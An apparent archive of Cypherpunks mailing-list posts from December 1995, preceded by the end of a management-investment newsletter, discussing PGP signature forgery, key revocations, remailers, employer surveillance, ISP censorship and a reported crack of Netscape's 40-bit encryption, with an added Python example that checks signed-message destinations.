and information about the short-term performance within one year or sooner.
The implementation of an overall SMS can be divided into small development
projects such as back-up system, customer complaint processing,
environmental communication and employee recruiting system development.
Specific Return on Investment and other financial and cost objectives can be
established for these projects, and they can be evaluated and monitored on a
quarterly and/or annual basis. However, the main strategic objective, the
aim of the SMS, can only be achieved, when all elements of the SMS have been
implemented, integrated and operated effectively. To justify, specific
investment decisions, both short-term and long-term financial indicators can
be used, which can satisfy many passive investor's requirements to commit to
the long-term investments.

Depending on the field of technology and business complexity, the
organization can spend up to 30 % of its annual revenue in the strategic
investments including system development and any new technology R&D
activities. In some cases, costs can be higher. What is the portion of this
amount that is invested in the development of the SMS? With some rough
information, it was possible to calculate that about 25 % of the total
annual strategic investment was spent in one ISO 9000 quality system
development. This 25 % was invested in organizational capability, improved
quality assurance and additional equipment, manpower and machine
acquisitions. Using the above estimation, the management estimated that it
had invested up to 7.5 % of its annual revenue in the strategic management
system development activities.  The major portion of this investment can be
used in tactical, short-term development projects such as returned goods
processing and test and equipment control, where the investment performance
data can be obtained faster; and the rest of the SMS investment can be used
for project/program management and coordination, organizational
restructuring, responsibility and authority definition, document and data
control and any other supporting system development activities, the
financial monitoring can be more difficult. The major cost categories in the
SMS development projects are: 1. development, implementation and training
time (manpower excluding external training, consulting and assessment
activities), 2. equipment and machine acquisitions, 3. materials such as
office supplies and 4. external project activities.

Investments in the development of any SMS can be either tactical or
strategic. The financial performance of the tactical investments is very
often much easier to evaluate than the evaluation of the long-term
investments that may not have specific and measurable investment objectives
and/or the accounting information to evaluate the performance against any
specific objectives which can be difficult to obtain. It is possible to
develop specific budgets for each element of the SMS development project and
identify the sources of development benefits and cost reductions that can be
used for evaluating the financial performance of each project. The financial
performance (including the maintenance of development budgets and the
achievement of investment performance ratios such as Return on Investment
and Investment Payback Period) can be reviewed and evaluated on a quarterly
and annual basis. Any consolidated investments in the whole Strategic
Management System development and the SMS development progress can be
reviewed in the annual Strategic Planning activities by the top management
in the same way as any specific tactical investments can be reviewed and
analyzed in the departmental level to identify any problem areas, any
potential problems and to determine and initiate necessary corrective and/or
preventive actions to achieve or maintain all financial performance
objectives and targets.

The organization should manage its investments in the SMSs such as ISO 9000,
ISO 14000 or Information Security Systems as it manages all its capital
expenditures or any investments in financial instruments such as stocks and
bonds. These investments have to be controlled, managed, reviewed and
improved upon on an on-going basis by the managerial level. Each element of
the SMS development can have its own budget and budget responsibility. The
organization may establish its own unique accounting system for each SMS
development project including specific cost and expenses categories, and
identifying specific sources of financial benefit information that can be
used to calculate financial ratios. Any over spending or other negative
financial performance issues can be brought to the attention in the
management reviews, which may lead to the initiation of necessary corrective
and preventive actions. It is easy to overspend and waste financial
resources such as the waste of manpower without adequate accounting, record
keeping and monitoring systems and methods. The utilization of actual
financial performance measures helps the organization also to see actual
financial benefits from the strategic investments and to justify additional
SMS development activities. However, we still have the question: "How much
should the organization invest in any specific SMS to satisfy its future
business requirements?" 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 29 Dec 1995 16:53:50 +0800
To: cypherpunks@toad.com
Subject: Ecash graphic images?
Message-ID: <199512290458.UAA15779@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone provide some pointers to a gif or jpeg file containing
good-looking ecash coins?  I would like something larger and more
detailed than the "we accept ecash" you see everywhere.  Thanks very
much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 16:40:52 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <ad08b1600b0210047eb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've purged the four accumulated names off the cc: list. I urge others to
do the same, as the headers are getting clogged up, and people are often
getting two copies.)


At 10:59 PM 12/28/95, Mike McNally wrote:

>Another vaguely-related concept is that of tenants' rights to a degree
>of security in rental property.

Actually, tenants have nearly absolute rights of privacy. Landlords cannot
enter the premises whenever they wish, conduct bed checks, sniff for
marijuana, etc.

However, landlords are also not held liable (in most cases) for the illegal
acts of tenants. (Obvious exceptions include recent developments with
"crack house" laws, or where the tenants are using a house as a base of
operations, such as shooting from windows...and even then the landlord's
responsibility is to cooperate with law enforcement: he is not liable for
the shootings, nor for anything else that he could not have reasonably
known about or controlled.)

Ditto for hotel owners. I wrote a long essay for the Cyberia list using
these examples as jumping off points for a view of law in cyberspace.
Basically, that ISPs be treated as hotel owners. Not liable for the
misdeeds of customers in the  "rooms" (in realspace hotels, or in
cyberspace).

However, corporations aren't given the luxury of disassociating themselves
from the actions of their employees. (Contract workers are a further issue,
and the issue of whether they supply their own tools/computers, workspace,
etc., enters in.)

I maintain that my employees are beholden to me as to what they run on
their computers. They can always choose not to work for me. (And the same
applies to hotels, actually. Were a hotel to have stringent rules on
in-room behavior, such as the YMCAs and religious retreat hotels have, then
customers have little right to complain about bed checks, mixed sex bans,
etc. That most hotels have no such rules says more about where the
Schelling points are than it does about the efficacy of rules and laws.)


>Though the ownership==control equation works sometimes, and is
>appealing to reason, I don't think things are always so simple.

Nor do I think things are always simple. But it pays to think about
proposed laws from a perspective of maximizing personal choice. (The choice
of the owner of a hotel, or computer, or car, to establish the basis for
trading use of his property for other considerations.)

--Tim May


We got computers, we're tapping phone lines.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Dec 1995 22:07:49 +0800
To: cypherpunks@toad.com
Subject: practical annoyances from multi-level security?
Message-ID: <Pine.SOL.3.91.951228220718.12483A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody have any pet peeves and gripes about using 
systems with a compartmentalised security model- things that took ages to 
do even though they didn't really impact security, features that just got 
in the way or were too complicated to really use, etc?

I'm currently working on a problem that seems to have some analogies to 
the compartmentalised problem, running code with various levels of trust 
where deliberate read-up and accidental write-down could be a breach. 
I've  personally never used a system of this sort, but I've heard from 
friends in the RAF doing COM/SEC (more COM than SEC) that MLS can be a 
real pain at times. [for the truly paranoid, the RAF operates a network 
of communication satellites called Skynet :-)]

Simon
p.s. 
  still no luck on the Hackers soundtrack - I did recognise a few prodigy 
tracks though

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (J.Francois)
Date: Fri, 29 Dec 1995 17:56:18 +0800
To: mjsus@atlanta.com
Subject: Re: Strategic Investments ....
In-Reply-To: <199512290101.UAA12519@atlanta.com>
Message-ID: <m0tVVY1-000xhOC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that mjsus@atlanta.com wrote:
 
> 
> This can be some interesting .....
> 
> 
> ****************************************************************************
> **********
> 
>                                 GLOBAL STRATEGIC SYSTEMS NEWSLETTER
> 
>                                                         December, 1995
> 
> Strategic Management Investments, Asset Allocation, Evaluation and Review

Look, I aint no crypto expert or nuthin', but I have spent a lot of time
looking for the algorithm or key to figure this thing out and I can't
find it. I got whole ROOMS of cpu's crankin' on this one, I even called
uncle Al at Fort Meade and he called back and said, 
"....dunno...must be some newfangled stego or something, I'll call you back".

Was this really a newsletter post or do I need to go back to codebreaker 
school?????

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
=========================No Unsolicited Email============================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: 355/113 -- Not the famous irrational number PI, but an incredible
simulation!

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cadams@fly.HiWAAY.net (Chris Adams)
Date: Fri, 29 Dec 1995 18:00:40 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <4bvub2$4b3@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Newsgroups: alt.security.pgp,sci.crypt,mail.cypherpunks

In article <oTTsgD7w165w@bwalk.dm.com>,
Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>I'll illustrate the problem with several scenarios of forgeries.

The easy way around this if you think this might happen is just to put a
line at the top of your signed message stating where the message is
supposed to go.  Then if people see it elsewhere, they can figure out
that something is amiss.

See above for an example.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
-- 
Chris Adams (cadams@HiWAAY.net)               Finger for PGP public key 
"So, if anybody wants to have hardware sent to them: don't call me, but
instead write your own unix operating system.  It has worked every time
for me." - Linus Torvalds, author of Linux (Unix-like) OS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 17:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad08c2760e0210048264@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:17 AM 12/29/95, Bill Humphries wrote:

[much good stuff, with which I agree, elided]

>Support your local ISP.

This simple line is very, very important!

Consider two extremes:

* Extreme 1--Internet access via Compuserve, AOL, or other organizations
striving for a "global presence." Every country these organizations do
business in puts pressure on them to control content, supply names of
contacts, etc. Singapore bans 200 newsgroups, Iraq executes the local
sysops, the U.S. jails the corporate executives for allowing
"alt.barney.die.die.die" to corrupt the morals of young people.

* Extreme 2--"Individuals on the Net directly." Joe User has a box on the
Net. Albania is powerless to hassle him. France cannot seize his computer.
(If he's in Country A, that country may harass him, but if he connects to
accommodation addresses in other countries, even this is lessened or avoided
completely.)

Small ISPs are closer to Extreme 2, as they have no presence in Albania,
Iran, France, Chad, or other states desiring to control content. For small
U.S. ISPs, their main worry is what the U.S. government will say they must
do.

Small, local ISPs may of course be more prone to other kinds of pressure.
But it is my experience that small services are less likely to adopt speech
codes and other draconian behavioral laws than are larger and "more
responsible" (:-}) services.

Jay Campbell, one of the sysops at my ISP, "got.net," may want to give his
perspective, if he sees this.

I see a positive longterm trend toward people connecting through smaller,
more local services. Hard to enforce Albania's laws on 20,000 small
Internet connection services. Even longer term, the anarchy of the Net will
reach its true flowering when millions of users are directly connected.

How ya gonna keep em down when they're directly on the Net?

--Tim May

We got computers, we're tapping phone lines.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hajo@quijote.in-berlin.de (Hans-Joachim Zierke)
Date: Sat, 30 Dec 1995 08:35:44 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <5-oG4BKKYgB@quijote.in-berlin.de>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Dr. Dimitri Vulis writes:

> I suggest to the kind folks working on PGP 3 that there should be a
> standard protocol to include within the signed portion the information on
> when and for whom this text is written: i.e. the list of e-mail recipients
> and/or Usenet newsgroups, which could be easily compared with the RFC
> 822/1036 headers of an e-mail/Usenet article.


This assumes that every Usenet site uses RFC 822/1036 headers locally. This
is no real-world assumption. 

And the clearsign problem can be solved with MIME only, since currently, 
the MIME 8-bit character set conversion will kill the validity of 
signatures, regardless of whether they are forged or not.

Since I know this, I seldom use clearsigning. Quite simply, it does not 
work, and that's a more severe problem. If an error on signature validation
is the normality, not the exception, the whole stuff does not make any 
sense.



hajo


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Sig validation of clearsigned 8 bit text is uncertain.

-----END PGP SIGNATURE-----
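
The destination check discussed in this thread (a destination line inside the signed text, compared against the RFC 822/1036 headers), as an added example that is not part of any original post. The function names and the sample message are constructed for illustration, and the PGP signature itself is assumed to have been verified separately.

```python
import re
from email import message_from_string
from email.utils import getaddresses

BEGIN_SIGNED = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
FIELD = re.compile(r"^(To|Cc|Newsgroups):\s*(.+)$", re.IGNORECASE)


def signed_text(body):
    """Return the lines covered by the clearsignature, dash-escaping undone."""
    lines = body.splitlines()
    try:
        start = lines.index(BEGIN_SIGNED)
        end = lines.index(BEGIN_SIG, start)
    except ValueError:
        return None
    block = lines[start + 1:end]
    if "" in block:                      # armor headers end at first blank line
        block = block[block.index("") + 1:]
    return [l[2:] if l.startswith("- ") else l for l in block]


def destinations(field, value):
    """Normalise one destination field into a set of lowercase names."""
    if field.lower() == "newsgroups":
        return {g.strip().lower() for g in value.split(",") if g.strip()}
    return {addr.lower() for _, addr in getaddresses([value]) if addr}


def declared(lines):
    """Destinations named in the header-like lines that open the signed text."""
    found = set()
    for line in lines:
        m = FIELD.match(line)
        if not m:
            break                        # declaration ends at first other line
        found |= destinations(m.group(1), m.group(2))
    return found


def check(raw):
    """Compare destinations inside the signed text with the outer headers."""
    msg = message_from_string(raw)
    lines = signed_text(msg.get_payload())
    if lines is None:
        return "unsigned", set()
    want = declared(lines)
    if not want:
        return "no-declaration", set()
    seen = set()
    for field in ("To", "Cc", "Newsgroups"):
        for value in msg.get_all(field, []):
            seen |= destinations(field, value)
    if not seen:                         # gateway dropped or rewrote the headers
        return "no-outer-destination", set()
    stray = seen - want
    return ("misdirected", stray) if stray else ("ok", set())


# Constructed sample: a clearsigned body that names its intended newsgroups.
SIGNED_BODY = """\
-----BEGIN PGP SIGNED MESSAGE-----

Newsgroups: alt.security.pgp,sci.crypt,mail.cypherpunks

The quarterly figures are attached.
- -- Constructed Sender

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

(constructed sample: signature data omitted)
-----END PGP SIGNATURE-----
"""


def wrap(headers):
    """Attach outer transport headers to the same signed body."""
    return headers + "\n" + SIGNED_BODY


def cases():
    """Three constructed deliveries of one signed body."""
    return {
        "posted where declared": check(wrap(
            "From: a@example.org\nNewsgroups: sci.crypt, alt.security.pgp\n")),
        "reposted elsewhere": check(wrap(
            "From: a@example.org\nNewsgroups: alt.test\n")),
        "headers lost at a gateway": check(wrap("From: a@example.org\n")),
    }


if __name__ == "__main__":
    for name, (verdict, stray) in cases().items():
        print(f"{name}: {verdict} {sorted(stray)}")
```

The third case returns no verdict at all: when the local transport does not carry the RFC 822/1036 destination headers, the comparison has nothing to compare against.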





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Fri, 29 Dec 1995 14:45:33 +0800
To: cypherpunks@toad.com
Subject: [reply to anonymous] Re: rsaref
Message-ID: <199512282306.AAA28036@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


to whom it may concern:

rsaref20 has been available on ftp.hacktic.nl since May 1995 in

 /pub/replay/pub/crypto/LIBS/rsaref20.zip

 -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@roboben.engr.ucdavis.edu>
Date: Fri, 29 Dec 1995 18:50:48 +0800
To: cypherpunks@toad.com
Subject: FW: your financial transactions posting (fwd)
Message-ID: <Pine.HPP.3.91.951229002106.13984A-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 29 Dec 1995 00:02:50 -0800
From: Bud Aaron <bud@checkmaster.com>
To: "'privacy@ftc.gov'" <privacy@ftc.gov>
Cc: "'hwg-business@daft.com'" <hwg-business@daft.com>
Subject: FW: your financial transactions posting


----------
From:  Greg Metcalfe[SMTP:biosphere@proaxis.com]
Sent:  Thursday, December 28, 1995 9:35 PM
To:  bud@checkmaster.com
Subject:  your financial transactions posting

Bud,

I've seen some well thought out messages in the commercial transactions
listserver, but you are the first that I've seen with real numbers.  Would
you do us all a favor and make sure that you get some of this information to
the privacy@ftc.gov discussion?  I hope I'm not impertinent for asking.  But
numbers are probably our only hope.  The gov has never really been into
quantitative thinking...

TIA
---
Greg Metcalfe                         |  The secret is getting
E-mail biosphere@proaxis.com          |      enough sleep.
URL http://www.proaxis.com/~biosphere |        Usually.  

The following is a copy of the information mentioned above:

The following article is quoted directly from Bank Technology News

"Are Internet Security Fears Unfounded?
Just how safe is the Internet? Pretty darn safe, according to
Forrester Research, Inc., Cambridge, MA. Forrester predicts
Internet fraud will occur far less frequently than current rates
of fraud with cellular telephones, toll calls and credit cards
(see chart).
Cellular telephone fraud costs the phone industry almost $20
per $1000 in revenue, Forrester says, and toll-call fraud eats
up $16 per $1000 in revenue. Meanwhile, credit-card fraud cost
MasterCard almost $1.50 per $1000 in revenue in 1993. In
contrast, Forrester says companies can expect to lose only
$1 per $1000 of transactions on the Internet. 
Forrester's contentions on the safety of the Internet are backed
up by some of the judges in this year's Best of the Newest bank
technology survey. While many of the judges expressed concern
over security issues, quite a few were also confident that the
Internet will become a stalwart transaction system. See page one
for further analysis of all the newest banking technologies."

The chart accompanying this article shows the fraud levels in
graphic form.

You folks keep making drafts as a collection system seem more
and more attractive. The fact that drafts MUST be deposited (not
just cashed) and that the bank is going to want to know the
depositor quite well means that tracking is excellent. The
requirement added by the FTC that those whose accounts are
being drafted must be notified by mail makes the system even
safer.

Let me add this - some level of security is obviously needed but
regardless of the level of security, fraud will occur. All of these
arguments for high levels of security remind me of the need for
virus protection. Yes, virus attacks are real but virus protection
vendors certainly make money by raising greater fear than may
be realistic.

Bud Aaron
bud@checkmaster.com
http://www.checkmaster.com/internetchecks/



The privacy list is run automatically by the Majordomo list manager.
Please mail questions/problems to owner-privacy@ftc.gov





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 29 Dec 1995 19:10:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Employer Probing Precedents?
Message-ID: <199512290937.BAA21468@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 PM 12/28/95 -0800, Tim May wrote:

>However, corporations aren't given the luxury of disassociating themselves
>from the actions of their employees. (Contract workers are a further issue,
>and the issue of whether they supply their own tools/computers, workspace,
>etc., enters in.)

I think this point about "contract workers" is going to become a lot more
interesting as people move away from the traditional "employee for life"
model and towards working at home/telecommunity, or working as
subcontractors/consultants, etc.

Further, it's becoming more common for employees to own their own
communications tools, and bring them to work. Arguments about a right to
eavesdrop as being derived from workplace property ownership don't seem to
work where an employee is talking on their personal cell phone,
getting/sending messages on the SkyTel two-way pager that they pay for,
using their laptop/Newton/PDA to get/send E-mail (using their private
ISP/POPmail provider mailbox), and so forth. The concerns (about disclosure
of secrets or wasting of time) raised to justify the invasions of employee
privacy are still present, of course, but not the convenient "it's not your
phone so you have no privacy" excuse. 

Employee/contractor ownership of work tools (or non-work related
communication tools in the workplace) is probably going to get even more
interesting; recent Ninth Circuit decisions re copyright law and licensing
agreements have been sharply restricting the right of software licensees to
allow third parties to use the licensed software. (e.g., _MAI v. Peak_ and
_Triad Systems_, see http://darkwing.uoregon.edu/~gbroiles/triad for more on
this and pointers to other analysis and the opinions themselves) I think
this may lead to software licenses (or hardware ownership) which follow
employees from home to work, and from job to job. Employees may get a
credential from Microsoft, or Borland, or Mathematica or Word Perfect saying
that they're allowed to be using a set of software tools; professionals will
probably pay for those credentials themselves, or have them paid for as a
fringe benefit of employment. An easy connection is to training related to
the "software-right" - the licensor would also certify that the employee has
been subjected to X hours of training and knows at least Y buzzwords and Z
fancy tricks relating to the software. Retired or unemployed workers may
work in a "black market", using software they're trained on but not
licensed/certified for, logging on with the credentials of licensed users
who have died recently or are sleeping. (Similar to the network of
unlicensed uninsured under-the-table contractors, framers, electricians,
drywall installers, etc., who exist at the fringes of construction
activity.) And so on.  

>I maintain that my employees are beholden to me as to what they run on
>their computers. They can always choose not to work for me. (And the same
>applies to hotels, actually. Were a hotel to have stringent rules on
>in-room behavior, such as the YMCAs and religious retreat hotels have, then
>customers have little right to complain about bed checks, mixed sex bans,
>etc. That most hotels have no such rules says more about where the
>Schelling points are than it does about the efficacy of rules and laws.

Subscribers to the Coase theorem would suggest that (modulo transaction
costs) it doesn't matter who is initially assigned the right to determine
whether or not surveillance will occur - the party who most values that
right will bargain for it in the end. Then again, that party may lose
something in exchange - and that's what makes this interesting. (And, I
think, much too complex to simply be dismissed as a matter of "property
rights". Then again, property looks to me like something that law creates,
not something which exists pre-law which law is created to protect. YMMV.)
I'd rather see the right to control surveillance assigned to employees, and
let employers pay extra for it if they think it's necessary to their
business situation. (Some might argue that this is the current situation, or
at least that surveillance is something that market participants bargain
over. My impression is that the current situation is legally murky absent a
clear statement re "we're going to monitor you on the phone and search your
briefcase when you enter and leave" and that a clear resolution re the legal
baseline of surveillance would be useful to bargainers. And if we were to
set a baseline for further bargaining, I'd rather see it set to favor
employees.)
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Fri, 29 Dec 1995 19:03:34 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Revocation of Zimmermann's fossil key
Message-ID: <199512290844.IAA02565@maalox>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To whom it may concern:

I have revoked my oldest PGP key, keyID FF67F70B, user ID 
  "Philip R. Zimmermann <prz@sage.cgd.ucar.edu>"
which should no longer be used.  Instead, use my newer key,
keyID C7A966DD, with user ID
  "Philip R. Zimmermann <prz@acm.org>"
The new key has been distributed with all PGP versions since version
2.3a in 1994.

My old email address at the sage site will soon disappear, so I'm 
revoking my old key.  I keep getting mail at my old address at sage
because people get that old address from my old key.  I can't just
revoke my old userID, so I have to revoke the whole key to get people
to stop using it.  Below is my revocation certificate, which I created
shortly after I generated my new key in 1994.  Please discontinue the
use of my old key and my old email address.  Note that this revocation
does not imply that my old key has been compromised.

 -Philip Zimmermann
  prz@acm.org

Here's my old public key with the revocation certificate...
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

- -----END PGP PUBLIC KEY BLOCK-----

Here's my new public key, generated in May 1994...
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 29 Dec 1995 20:35:21 +0800
To: cypherpunks@toad.com
Subject: ideath remailer permanently down / PGP key changes for Greg Broiles
Message-ID: <199512291202.EAA02102@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I don't think that the local freenet folks are ever going to get my domain name 
again, so I'm officially announcing the closing of the remailer formerly located
"remailer@ideath.goldenbear.com". Mail to the goldenbear.com domain has been bou
for almost three weeks now, and I expect that to continue. Sorry for any inconve
I predict about a year of erratic net access and moving around while I finish la
school, take the bar exam(s), and find a job or get a business started. When eve
settles down I plan to find a reliable net connection and run a remailer again. 

Due to the loss of my domain name and UUCP connectivity, other changes are happe

I'm now using a Windows box, not a Unix box, for my net access; have switched to
for DOS and Private Idaho (nice job, Joel!).

Am also using a new PGP key, since my old one (0x58ddf30d) was almost 3 years ol
updated the MIT PGP keyserver with an "obsolete" marker for the old key, as well
new key (signed by my old key). The new key is appended to this message.

Am using a new long-term E-mail address, "gbroiles@netbox.com". Re my discussion
weeks ago of alternatives for mail storage/forwarding, I have settled on netbox.
can receive mail as "gbroiles@darkwing.uoregon.edu" but I expect that address to
working sometime this coming May. The netbox.com address will ideally keep worki
years to come.

- --
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 29 Dec 1995 23:08:37 +0800
To: cypherpunks@toad.com
Subject: Re: ideath remailer permanently down / PGP key changes for Greg Broiles
Message-ID: <199512291247.EAA05290@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



Doh, the wordwrap on that message was ugly. Sorry. Gotta spend some more
time making friends with Private Idaho. 

Short version: remailer@ideath.goldenbear.com is gone forever, sorry. All
mail to anything @goldenbear.com is bouncing. Mail for me should be sent to
"gbroiles@netbox.com", effective immediately. I have distributed a new PGP
key to the keyservers and marked my old key obsolete. I will be signing list
messages again once I get that wordwrap thing fixed. 

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 23:06:37 +0800
To: cypherpunks@toad.com
Subject: CAV_ein
Message-ID: <199512291234.HAA01062@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-29-95. NYPaper: John Markoff page-ones Compuserve's
   cave-in to Reich sex law and the alt free-screeching for
   sex home censorship cave-in to rutting parents ashamed.

   CAV_ein







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Fri, 29 Dec 1995 23:46:58 +0800
To: cypherpunks@toad.com
Subject: Netscape 40-bit cracking. The new computing benchmark?
Message-ID: <Pine.BSD/.3.91.951229084345.18726A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Infoworld Dec 25, 1995 page 3.

Netscape Commerce Server Security Broken

Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it 
has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape 
Commerce Server.  Unlike a similar security break-in [talk about bad 
terminology] by a French university student last August, which required 
eight days, 120 workstations, and two supercomputers, ICE said it used a 
computer that cost $83,000 and compromised the World Wide Web server's 
security in 7.7 days. [Hey, what about the Cypherpunks crack that 
only took 31.8 hours?] Netscape Communications Corp. officials were not 
surprised by the security crack. "We've known that 40-bit encryption is 
breakable since we shipped the server.  That's the reason it's allowed to 
be exported," said company spokeswoman Rosanne Siino. "We need to keep 
lobbying to get rid of the U.S. government's 40-bit restriction on what 
can be exported."  Within the United States, Netscape sells products with 
128-bit encryption.



      Weld Pond   -  weld@l0pht.com   -        http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 30 Dec 1995 07:02:46 +0800
To: cypherpunks@toad.com
Subject: Re: Ecash graphic images?
Message-ID: <v02120d0aad09dc07f243@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:58 12/28/95, anonymous-remailer@shell.portal.com wrote:
>Could anyone provide some pointers to a gif or jpeg file containing
>good-looking ecash coins?  I would like something larger and more
>detailed than the "we accept ecash" you see everywhere.  Thanks very
>much.

Try http://www.delorie.com/gif/signs/


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 30 Dec 1995 05:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <199512291548.KAA19627@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 28, 1995 23:30:19, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
 
> 
>I see a positive longterm trend toward people connecting through smaller, 
>more local services. 
> 
 
Quite correct. 
 
Not only does the internet radically change (at least perceptions) of space
and time, it also is producing serious disequilibriums of scale in
economics. 
 
Economy of scale states that until a fairly high limit is reached, bigger
enterprises tend to produce goods that are less expensive than those
produced by smaller enterprises. Specialized handicraft production aside,
the goods produced in larger enterprises also tend to be of higher quality.

 
The disequilibrium here began with the development of the microprocessor as
we see from the shift to the old centralized IBM iron to the microcomputers
we're using today. Ditto certain aspects of network switching. Ditto DES
